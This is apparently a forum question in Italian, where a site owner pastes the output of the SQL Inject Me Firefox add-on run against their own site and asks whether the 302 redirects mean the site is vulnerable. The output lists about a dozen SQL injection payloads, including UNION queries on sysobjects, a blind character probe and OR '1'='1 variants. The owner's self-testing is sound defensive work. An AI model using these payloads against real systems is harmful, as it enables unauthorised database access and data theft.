Usando il componente aggiuntivo SQL Inject Me per Firefox, ho selezionato le caselle di controllo e poi clicco sul pulsante Execute dello strumento SQL Inject Me.
Dopo aver ottenuto il risultato, ha visualizzato le seguenti risposte
Server Status Code: 302 Moved Temporarily
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Moved Temporarily
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Moved Temporarily
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Moved Temporarily
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Moved Temporarily
Tested value: 1'1
Server Status Code: 302 Moved Temporarily
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Moved Temporarily
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Moved Temporarily
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Moved Temporarily
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Moved Temporarily
Tested value: '; DESC users; --
Server Status Code: 302 Moved Temporarily
Tested value: 1'1
Server Status Code: 302 Moved Temporarily
Tested value: 1' OR '1'='1
Trova l'immagine allegata.
Voglio sapere cosa si sposta esattamente temporaneamente 302?
Il mio sito è vulnerabile?